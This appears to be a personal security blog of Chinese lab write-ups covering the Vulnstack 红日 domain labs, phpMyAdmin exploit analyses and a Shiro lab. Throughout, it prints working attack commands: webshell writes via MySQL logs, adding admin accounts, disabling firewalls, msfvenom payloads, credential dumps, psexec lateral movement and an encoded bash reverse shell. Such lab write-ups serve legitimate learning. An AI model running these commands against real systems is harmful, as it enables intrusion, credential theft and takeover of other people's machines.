这里的另外一个网卡,作者设置的是111网段,但是我习惯了自己的ip,所以选择改pc和web两台机器里面的ip

先改一下pc这台机器,这台先改下ip

再测试一下连通性,使用外部的parrot机器ping一下,没通,需要关闭防火墙

最后配置web机器,web机器需要先将恢复快照1.3版本会出现一个报错,直接点放弃就行,这里恢复快照之后,需要重新改网卡,怪不得ping不通域控的

登录本地用户

.\de1ay
1qaz@WSX

这里提示需要修改密码,我改成1qaz@WSX3

进去之后直接注销掉,切换成域用户mssql,密码还是1qaz@WSX

然后还是先改ip

改完之后测试一下两个网段都能不能ping通

ping不通的话得关一下web的防火墙,关掉之后就能ping通了

红日1是以phpstudy搭的一个web服务，红日2用的是weblogic。web服务中，我们需要手动打开weblogic

进入这个路径C:\Oracle\Middleware\user_projects\domains\base_domain\bin,没权限的时候,输管理员凭据就行.

以管理员身份启动一下weblogic

搭建时参考的文章提到: WEB机和PC机：计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动（Computer Browser 是关闭的,导致 net view 显示 6118 error 没能解决，在域信息收集时暂时关闭一下防火墙）

我这里web里的Computer Browser是关闭的,我手动打开了,pc机器是正常的.

访问192.168.3.80:7001/console,跳转进去登录页面,环境搭建成功

web 192.168.3.80
pc  192.168.3.201
win 192.168.3.99
wsl kali 192.168.3.100

外网

信息收集

先处理web机器

端口扫描出来了不少端口,使用awk做一下处理,提取一下

awk -F '/'  'BEGIN {ORS=","} {print $1}' a.txt

进行-A扫描

⇒  sudo nmap -Pn -sT 192.168.3.80  -p80,135,139,445,1433,3389,7001,49152,49153,49154,60966,63624,63632,63634 -A  --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-28 19:40 EDT
Nmap scan report for 192.168.3.80
Host is up (0.00057s latency).

PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-28T03:49:00
|_Not valid after:  2054-09-28T03:49:00
| ms-sql-ntlm-info: 
|   192.168.3.80:1433:
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
|_ssl-date: 2024-09-28T23:42:32+00:00; 0s from scanner time.
| ms-sql-info:
|   192.168.3.80:1433:
|     Version:
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2024-09-27T03:21:26
|_Not valid after:  2025-03-29T03:21:26
|_ssl-date: 2024-09-28T23:42:32+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: DE1AY
|   NetBIOS_Domain_Name: DE1AY
|   NetBIOS_Computer_Name: WEB
|   DNS_Domain_Name: de1ay.com
|   DNS_Computer_Name: WEB.de1ay.com
|   DNS_Tree_Name: de1ay.com
|   Product_Version: 6.1.7601
|_  System_Time: 2024-09-28T23:42:27+00:00
7001/tcp  open  http               Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
|_http-title: Error 404--Not Found
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
60966/tcp open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
|   192.168.3.80:60966:
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ms-sql-info:
|   192.168.3.80:60966:
|     Version:
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 60966
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-28T03:49:00
|_Not valid after:  2054-09-28T03:49:00
|_ssl-date: 2024-09-28T23:42:32+00:00; 0s from scanner time.
63624/tcp open  msrpc              Microsoft Windows RPC
63632/tcp open  msrpc              Microsoft Windows RPC
63634/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 00:0C:29:42:36:4C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista|7|8.1
OS CPE: cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-09-28T23:42:27
|_  start_date: 2024-09-28T03:48:57
|_nbstat: NetBIOS name: WEB, NetBIOS user: , NetBIOS MAC: 00:0c:29:42:36:4c (VMware)
| smb-security-mode:
|   account_used: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -53m19s, deviation: 2h39m59s, median: 0s
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2024-09-29T07:42:27+08:00
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms 192.168.3.80

这里的web端口是7001的weblogic

weblogic_10.3.6_利用

最后一个复现的漏洞的影响版本里面就有这个10.3.6,先测测这个(好吧,vulhub上weblogic的那几个漏洞基本上都有10.3.6.0) weblogic-wls-wsat-反序列化漏洞这个检测脚本卡主了,上一键利用工具了

CVE-2016-0638

antsword_内存马

使用这个工具里面的内存马,上传antsword_Custom_Filter内存马

|650

进去之后查看ip,是存在内网环境的

内网

这里还有一台PC机器是暴露在外网环境中的,但是已经拿了web机器的shell,就先进内网

信息收集

局域网机器

本机信息

无法查看域用户

本地管理员组,这里面有域用户DE1AY\Domain Admins这个域用户

域信息

CS上线

添加监听器

name：为监听器名字，可任意
payload：payload类型
HTTP Hosts: shell反弹的主机，也就是我们kali的ip（如果是阿里云，则填阿里云主机的公网ip）
HTTP Hosts(Stager): Stager的马请求下载payload的地址（一般也是和上面的ip填一样）
HTTP Port(C2): C2监听的端口

创建payload

上传马子,将shell传到cs上

获取明文凭据

rdp也能连上去

噢,简称和完整域名的区别

CS后渗透_横向移动

上线cs之后,使用cs上面的横向移动模块中psexec就能解决掉剩下的两台机器了

域控

PC机器

links

https://xz.aliyun.com/t/11676

https://www.viewofthai.link/2022/09/11/红日att＆ck系列靶场（二）/

CVE-2018-2628检测脚本

phpMyAdmin-4.0.x—4.6.2_远程代码执行漏洞

2024-09-18T16:59:09+08:00

漏洞简介

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。

在其查找并替换字符串功能中，将用户输入的信息拼接进preg_replace函数第一个参数中。在PHP5.4.7以前，preg_replace的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。

影响版本

// 漏洞涉及的组件,版本

phpmyadmin 4.0.x-4.0.10.16 4.4.x-4.4.15.7 4.6.x-4.6.3（实际上由于该版本要求PHP5.5+，所以无法复现本漏洞）

Php版本： 4.3.0 ~5.4.6 Php 5.5 版本以上的将 preg_replace 的 /e修饰符给废弃掉了

利用条件

// 利用这个漏洞的前置要求,例如进后台啥的

这个漏洞需要登录，且要能够写入数据。

前置知识

preg_replace的/e参数

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject,[int limit],[int count])

$pattern: 要搜索的模式，可以是字符串或一个字符串数组。反斜杠定界符尽量不要使用，而是使用 # 或者 ~
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
$limit: 可选，对于每个模式用于每个 subject 字符串的最大可替换次数。默认是-1（无限制）。
$count: 可选，为替换执行的次数。

/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示：要确保 replacement 构成一个合法的 PHP 代码字符串，否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。例如,对于下面这个代码,访问h=phpinfo(),就能触发phpinfo页面

php
preg_replace("/test/e",'phpinfo()',"jutst test");
?>

漏洞复现

//手测,脚本

使用的vulhub的环境,使用docker启动就行

这里是直接使用了exploit-db中的poc

漏洞分析

// 分析原理,调用链

参照网上其他人的分析文章, 首先找到preg_replace()函数的调用位置, 发现是在 /libraries/TableSearch.class.php 文件中的_getRegexReplaceRows方法里面

接下来就是依次寻找find,replaceWith和row[0]这三个参数的来源

可以看到find,replaceWith是直接从getReplacePreview中传递过去的

继续往上查找getReplacePreview方法,发现是在tbl_find_replace.php中被调用的,这里的可以看到find,replaceWith都是直接从POST中传递进来的

解决了前面两个参数,接下来就是看第三个参数是怎么来的,毕竟这个/e参数要成功执行代码,需要正则的模式被匹配到.

回到_getRegexReplaceRows方法,可以看到row[0]应该是sql语句查询结果的第一列数据

sql语句的内容如下

SELECT 
    PMA_Util::backquote($column),   -- 获取列名并进行反引号处理
    1,                              -- 添加一个额外的列，该列用于存储替换后的值
    COUNT(*)                        -- 计算匹配的行数
FROM 
    PMA_Util::backquote($this->_db)   -- 数据库名，反引号处理
    .PMA_Util::backquote($this->_table) -- 表名，反引号处理
WHERE 
    PMA_Util::backquote($column)       -- 目标列
    RLIKE '" . PMA_Util::sqlAddSlashes($find) . "'  -- 使用正则匹配 $find，确保字符转义
    COLLATE " . $charSet . "_bin      -- 使用二进制排序规则进行区分大小写的比较
GROUP BY 
    PMA_Util::backquote($column)       -- 按目标列分组
ORDER BY 
    PMA_Util::backquote($column) ASC   -- 按目标列升序排列

这里面我们需要能够控制column,_db,_table,其中column是来自columnIndex这个参数,这个也是POST传进来的

剩下两个参数是PMA_TableSearch类的属性,是在构造函数里面被定义的

继续回溯,tbl_find_replace.php中创建了这个类,并传入了$db, $table这两个参数

这两个参数是包含的libraries/common.inc.php文件,这两个参数可以通过REQUEST方法来接收变量并将其设置为全局变量。

结合上面的分析,看看exploit-db给的poc

使用poc,然后用burpsuite抓了一下包,脚本先是进行了登录

前面两个数据包好像都是在获取一些Cookie信息,第一个是在登录获取token值,第二个包是在访问主页,获取了另外的一些值

第三个包访问了/import.php,这个文件是PhpMyAdmin中处理SQL导入的页面。这个页面允许管理员导入SQL查询语句，并在数据库中执行。

创建了一个数据库test,数据表prgpwn,以及插入了数据(0/e\0) 即0/e和一个null byte

|900

最后一个包,访问了漏洞所在的php文件,/tbl_find_replace.php

传入了db,table,find,replaceWith这些参数,find和replaceWith直接被拼接到了preg_replace的前面两个参数中,而POST的数据中的db,table,columnIndex指定了sql查询得到的结果,这个结果被拼接到了preg_replace的第三个参数,从而触发了preg_replace的/e参数的执行代码功能.

find参数中传进去的%00也就是空字符,将拼接之后的/给截断了

php
	echo preg_replace("/0/e\0/","system('id')","0/e\0")
?>

漏洞修复

// 升级版本,打补丁,黑名单,白名单…..

及时更新版本。

参考资料

phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution - PHP webapps Exploit

PHP安全之慎用preg_replace的/e修饰符 - y’ang - 博客园

CVE-2016-5734 phpmyadmin后台代码执行漏洞复现

phpmyadmin-4.8.1远程文件包含

2024-09-18T15:33:13+08:00

漏洞简介

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。

这个漏洞刚刚打演练的时候用过,分析一下原理

影响版本

phpmyadmin 4.8.0 & 4.8.1

前提条件

能够进入后台,也就是要有数据库的凭据

前置知识

php文件包含

服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP来执行，这会为开发者节省大量的时间。文件包含相关函数

require()#函数出现错误的时候，会直接报错并退出程序的执行
require_once()#只包含一次
include()#在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行
include_once()#只包含一次

文件包含分为本地文件包含和远程文件包含

远程文件包含利用需要下面这两个配置文件都开启当allow_url_include和allow_url_fopen都开启时，可以通过利用远程url或者php://协议直接getshell，即远程文件包含，但allow_url_include在php5.2之后默认为off，利用机会有限。

当allow_url_include and allow_url_fopen均为off 在window主机环境下仍然可以进行远程文件执行，用445端口SMB协议进行远程加载。

漏洞复现

直接访问下面的路径,能输出passwd内容那就是有了

/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

利用方式的话,就是先在sql栏执行一下select命令,然后去包含session文件,就能获得webshell,进而拿shell

可以执行一下SELECT ;，然后查看自己的sessionid（cookie中phpMyAdmin的值），然后包含session文件即可：

对应的sessions文件是 /tmp/sess_sessionid phpmyadmin-4_8_1远程文件包含漏洞（CVE-2018-12613）

漏洞分析

简单来说就是phpmyadmin对用户传入的参数直接进行了包含,并且黑名单的检验不严格,可以绕过,从而导致了LFI

index.php
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

# 黑名单
$target_blacklist = array (
    'import.php', 'export.php'
);

然后就是在phpmyadmin中,执行sql语句之后,会存储在session文件中,如果包含这个文件,就能让select里面的php代码被执行

/index.php?target=db_sql.php?/../../../../../../../../etc/passwd
#Windows环境下利用需要对?进行编码
/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_21faa6130eaba2b5e04e313bfacc60d4

漏洞发现

进入后台之后,查看版本信息

漏洞修复

升级phpmyadmin版本

漏洞总结

这个漏洞刚刚演练的时候利用过,比较熟悉了… 记忆这个漏洞

组件:phpmyadmin
版本:4.8.1&4.8.0
漏洞类型:文件包含

假设你在尝试利用,挖掘这个漏洞

漏洞产生点:首页的target参数
漏洞类型:文件包含
漏洞利用方法:通过对sessions文件进行包含从而实现rce
遇到问题之后的解决方案:

红日靶场1

2024-08-25T16:08:47+08:00

前言

之前打了一个linux域的靶机,在巨魔的wp站里看见了红日靶场系列,学习一下win域

红日靶场1-win域

环境搭建

下载完之后,解压,并在vmware中扫描虚拟机

根据这个网络拓扑图,win7机器有两个网卡,是通外网的,win2003和win2008是在内网环境中

先给win7添加一下网卡,这里我习惯使用桥接,所以另一个网卡是桥接模式

然后再为另外两台机器设置only-host模式,并在网络编辑器中将这个模式的网段修改为192.168.53.0/24

最后进入win7机器,进去之后要改默认密码(hongrisec@2019),改成了l1uyun@2024,启动web服务器.

|536

外网渗透

端口扫描

win7机器是桥接在192.168.71.0/24这个子网的

arp-scan扫描局域网内主机

[~/workspace]$ sudo arp-scan -I eth5 -l
Interface: eth5, type: EN10MB, MAC: f6:39:4a:3d:95:18, IPv4: 192.168.71.99
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.71.79   00:0c:29:a7:c1:b2       VMware, Inc.
192.168.71.244  ca:a7:78:4d:50:e1       (Unknown: locally administered)

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.108 seconds (121.44 hosts/sec). 2 responded

使用nmap来扫描一下这个主机

➜  workspace  sudo nmap -sS -Pn 192.168.71.79  -p- --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 16:26 CST
Nmap scan report for 192.168.247.79
Host is up (0.00054s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:A7:C1:B2 (VMware)


➜  workspace  sudo nmap -sT -Pn 192.168.71.79  -p80,3306 -A  --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 16:29 CST
Nmap scan report for 192.168.247.79
Host is up (0.00049s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|specialized|general purpose
Running (JUST GUESSING): Microsoft Windows Phone|7|8.1|2008|Vista (96%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows_server_2008::beta3 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8
Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows 8.1 R1 (94%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows Server 2008 SP1 (89%), Microsoft Windows 7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

再对mysql扫一下

➜  workspace  sudo nmap -sS -Pn 192.168.71.79  -p3306 --script="*sql*"  --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 16:31 CST
Nmap scan report for 192.168.247.79
Host is up (0.00034s latency).

PORT     STATE SERVICE
3306/tcp open  mysql
|_mysql-empty-password: Host '192.168.247.149' is not allowed to connect to this MySQL server
| mysql-enum: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
| mysql-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 50009 guesses in 24 seconds, average tps: 2012.9
MAC Address: 00:0C:29:A7:C1:B2 (VMware)

phpmyadmin弱口令+日志写入Getshell

进去之后是phpstudy页面,数据库这里使用root,root测试成功

尝试在外面连接,连不上去

➜  workspace  mysql -h 192.168.71.79 -u root -p
Enter password:

扫目录发现存在phpmyadmin,phpstudy这玩意集成了phpmyadmin

这里的secure_file_priv=NULL,不允许导入导出,所以不能直接写入shell

再尝试一下通过日志Getshell的方法

SHOW VARIABLES LIKE ‘%general_log%’

启用日志功能,然后修改日志文件路径,这里的绝对路径是在php探针里面泄露的

set global general_log = on;
set global general_log_file='C:/phpStudy/WWW/shell.php';
select "$_POST['123']);?>"

使用蚁剑连接,拿到shell

yxcms后台修改模板Getshell

以学习为主,phpmyadmin拿到shell之后,再看看有没有其他的拿shell的方法吧

查看路径,发现有个yxcms,进去看看

这都不用搜索了,前台模板这个位置大概率能执行php代码

找到这个layout.php,这个文件是每个页面都需要包含的,所以在这里写入webshell

可以连接

这个cms里面也有sql执行,就不看了

内网渗透

信息收集

域渗透信息收集checklist

 ipconfig /all   # 查看本机ip，所在域
 route print     # 打印路由信息
 net view        # 查看局域网内其他主机名
 arp -a          # 查看arp缓存
 net start       # 查看开启了哪些服务
 net share       # 查看开启了哪些共享
 net share ipc$  # 开启ipc共享
 net share c$    # 开启c盘共享
 net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
 net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
 dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件
 
 net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 # 查看本机用户列表
 net user /domain         # 查看域用户
 net localgroup administrators    # 查看本地管理员组（通常会有域用户）
 net view /domain         # 查看有几个域
 net user 用户名 /domain   # 获取指定域用户的信息
 net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
 net group 组名 /domain    # 查看域中某工作组
 net group "domain admins" /domain  # 查看域管理员的名字
 net group "domain computers" /domain  # 查看域中的其他主机名
 net group "doamin controllers" /domain  # 查看域控制器（可能有多台）

权限是administrator

发现有内网网段

查看域用户

查看域管理员信息

整理一下收集到的win域信息

该域名为god.org，域控为OWA，域管理员为Administrator，内网网段为192.168.52.1/24，我们用ping命令探测域控的ip

域控的ip为192.168.52.138

尝试rdp

接下来在win7机器上增加用户，看能不能rdp上去

net user l1uyun aBc12@liuyun
net localgroup administrators l1uyun /add

查看3389端口是否开启,没有启动的话就手动启动一下

关闭防火墙
netsh advfirewall set allprofiles state off
查看是否开启
netstat -ano | find "3389"
没有开启的话手动开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

成功rdp上去了

msf上线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.71.101 LPORT=10010 -f exe -o shell.exe

msfconsole -q
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost 192.168.71.101
set lport 10010              
exploit

这里最开始wsl是镜像网络, 后面改成桥接之后才成功反弹回去

getsystem提权

提权,使用meterpreter里面的getsystem一键提权

迁移进程

使用ps查看进程信息,msf的进程pid为5060,apache的为2860,进行进程迁移

迁移,然后清除痕迹

收集凭据

获取hash

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
l1uyun:1009:aad3b435b51404eeaad3b435b51404ee:e632033e620c600f68dc60c32b103d8c:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

这里需要进一步使用Mimikatz来提取凭证、密码和其他敏感信息。

在msf中是使用kiwi来进行平替

kiwi模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的，则必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载kiwi并且查看系统明文。如果目标系统是32位的，则没有这个限制

因为还需要system的权限,所以只能迁移到system用户的进程中

获取到明文凭证

搭建socks隧道

第一次使用msf来搭socks,之前都是在用frp

run post/multi/manage/autoroute        #加载MSF的autoroute模块，获取当前机器的所有网段信息

这里为啥要使用autoroute这个模块呢

使用auxiliary/server/socks_proxy模块来实现socks

先background把现在的meterpreter会话挂起,然后加载这个模块

查看jobs可以看到后台运行的socks进程

主机探测

使用arp-scanner模块进行内网的扫描

use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
sessions  # 查看session列表
set session 1
run

msf6 post(windows/gather/arp_scanner) > run

[*] Running module against STU1
[*] ARP Scanning 192.168.52.0/24
[+]     IP: 192.168.52.1 MAC 00:50:56:c0:00:01 (VMware, Inc.)
[+]     IP: 192.168.52.138 MAC 00:0c:29:3f:5d:a9 (VMware, Inc.)
[+]     IP: 192.168.52.143 MAC 00:0c:29:a7:c1:a8 (VMware, Inc.)
[+]     IP: 192.168.52.141 MAC 00:0c:29:6d:39:34 (VMware, Inc.)
[+]     IP: 192.168.52.255 MAC 00:0c:29:a7:c1:a8 (VMware, Inc.)
[+]     IP: 192.168.52.254 MAC 00:50:56:eb:1e:41 (VMware, Inc.)
[*] Post module execution completed

当前机器的ip是192.168.52.143,域控的是192.168.52.138 所以说目前内网里面有三台机器138,141,143

还可以使用ping来做主机探测

C:\Windows\system32>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
���� 192.168.52.138 �Ļظ�: �ֽ�=32 ʱ��<1ms TTL=128
���� 192.168.52.141 �Ļظ�: �ֽ�=32 ʱ��<1ms TTL=128
���� 192.168.52.143 �Ļظ�: �ֽ�=32 ʱ��<1ms TTL=128

端口扫描

扫一下域控的端口

msf6 post(windows/gather/arp_scanner) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check p  
                                           er host
   DELAY        0                yes       The delay between connections, per thread  
                                           , in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by  
                                            which to +/- DELAY) in milliseconds.      
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)      
   RHOSTS                        yes       The target host(s), see https://docs.meta  
                                           sploit.com/docs/using-metasploit/basics/u  
                                           sing-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one  
                                            per host)
   TIMEOUT      1000             yes       The socket connect timeout in millisecond  
                                           s


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.52.138:       - 192.168.52.138:53 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:80 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:88 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:139 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:135 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:389 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:445 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:464 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:593 - TCP OPEN
[+] 192.168.52.138:       - 192.168.52.138:636 - TCP OPEN

445端口是开放的,扫一下永恒之蓝

ms17_010永恒之蓝

这里可以确定域控机器上是有永恒之蓝的

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.52.138:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.52.138:445    - Scanned 1 of 1 hosts

但是尝试了msf的exploit/windows/smb/ms17_010_eternalblue和 exploit/windows/smb/ms17_010_psexec都失败了

最后这个执行命令的可以用

那就添加一个用户,然后rdp上去算了先添加一个用户

查看添加的用户,添加成功

给管理员权限

set COMMAND net localgroup administrators hack /add
set COMMAND net localgroup administrators

3389是关闭的,尝试开启3389

这边是显示已经开启了的,但是还是连不上去

原来是防火墙没关

set COMMAND  'netsh advfirewall set allprofiles state off'

这里为啥凭据会是错误的….我在虚拟机界面是可以使用这个凭据登进去的…

cs上线

看了不少wp都是用cs拿的域控

另一边连接cs_server

启动监听器

生成payload

然后在蚁剑上上传进去,并执行,这边很快的显示弹回来了

之后再beacon进行交互

sleep 0  # 进入交互模式
getsystem # 提权
net view # 查看当前网络中的其他机器

查看完之后再target视图中可以看到其他机器了,如果没有的话就扫描一下

然后右键,选择psexec64

新建一个用于psexec的监听器,然后

运行之后就能拿到shell了,换成cs之后,很容易的就拿到了域控的shell

最后以同样的方法,使用psexec32上线win2003机器

l1uyun

第一次打win域的机器,过段时间再打一下这台机器,这次是在学习打win域的流程了

这机器拖了好久才弄完…

links

记录红日靶场一 | yuki’s Blog

红日-VulnStack靶场-ATT&CK（一）横向渗透两种方法_红日内网渗透靶场-CSDN博客

cobalt strike安装及使用方法 – 学习笔记

实战｜记一次基础的内网Vulnstack靶机渗透一

Puff-Pastry打靶

2024-08-18T11:59:41+08:00

前言

在群里瞅见了这个靶机,没打过这种复杂环境的靶机,玩一下

Puff-Pastry打靶记录

搭建

使用docker搭建,然后本地能够访问到一个8080端口

|207

这里我最开始是使用的Windows docker,后面改成了使用虚拟机

shiro

探测

java后端

|522

进去只有一个登录框,在搭建过程中已经知道了第一台机器是shiro,选择记住密码,登录

这里出现了shiro的特征 Cookie中存在rememberme字段

|453

shiro利用

直接上利用工具

获取flag

拿一个反弹shell

echo 'bash -i 5<>/dev/tcp/192.168.122.102/1234 0>&5 1>&5' | base64

bash -c {echo ,YmFzaCAtaSA1PD4vZGV2L3RjcC8xOTIuMTY4LjEyMi4xMDIvMTIzNCAwPiY1IDE+JjUK}|{base64,-d}|{bash,-i}

成功拿到shell

 $ pwncat  -l 1234
id
uid=0(root) gid=0(root) groups=0(root)
/usr/bin/script -qc /bin/bash /dev/null
root@653a3ab3924e:/#

内网扫描

然后开始扫描内网.

这里不知道为啥出现了三台机器(多了一台192.168.100.1),192.168.100.3才是我接下来要利用的thinkphp机器.

root@74d34925b057:/tmp# ifconfig
